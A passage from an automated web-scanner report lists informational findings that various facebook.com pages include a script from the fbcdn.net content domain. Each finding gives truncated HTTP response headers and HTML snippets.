P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.35. http://www.facebook.com/deedee.perez1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/deedee.perez1

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.36. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.37. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.38. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.39. http://www.facebook.com/fayse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/fayse

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.40. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.41. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.42. http://www.facebook.com/gale.l.schenk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/gale.l.schenk

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.43. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.44. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.45. http://www.facebook.com/izaOllie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/izaOllie

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.46. http://www.facebook.com/jezzas previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/jezzas

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.47. http://www.facebook.com/kimberly.christ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/kimberly.christ

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.48. http://www.facebook.com/ladonna.lokey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ladonna.lokey

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.49. http://www.facebook.com/lakendra.roberts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/lakendra.roberts

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.50. http://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/login.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.51. http://www.facebook.com/matthew.oliveira2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/matthew.oliveira2

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmatthew.oliveira2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.47
Connection: close
Date: Thu, 05 May 2011 11:42:11 GMT
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.52. http://www.facebook.com/mmafighting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mmafighting

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.53. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.54. http://www.facebook.com/pages/Barnesville/115038011847083 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Barnesville/115038011847083

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.55. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Beacon-of-Hope-Resource-Center/34194116820

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.56. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Bernicks-Pepsi/123296084349478

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.57. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Blaine-Senior-High/106189406087059

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.58. http://www.facebook.com/pages/Editor-in-Chief/137829579583400 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Editor-in-Chief/137829579583400

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.59. http://www.facebook.com/pages/Gilco-Corporation/109823499042436 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Gilco-Corporation/109823499042436

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.60. http://www.facebook.com/pages/HMFIC/149403761740008 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/HMFIC/149403761740008

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.61. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Manchester-Connecticut/112527912096312

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.62. http://www.facebook.com/pages/Merchandiser/123981654314779 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Merchandiser/123981654314779

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.63. http://www.facebook.com/pages/New-Haven-College/130105783687523 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/New-Haven-College/130105783687523

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.64. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Northern-Illinois-University/108155335871674

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.65. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/San-Antonio-Texas/110297742331680

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.66. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.67. http://www.facebook.com/pages/Sporting-News/104068362964496 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Sporting-News/104068362964496

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.68. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.69. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.70. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.28.109
Connection: close
Date: Thu, 05 May 2011 10:56:39 GMT
Content-Length: 32043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.71. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/memorial-high-school-west-new-york-nj/114508558584580

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.72. http://www.facebook.com/patroyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/patroyo

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
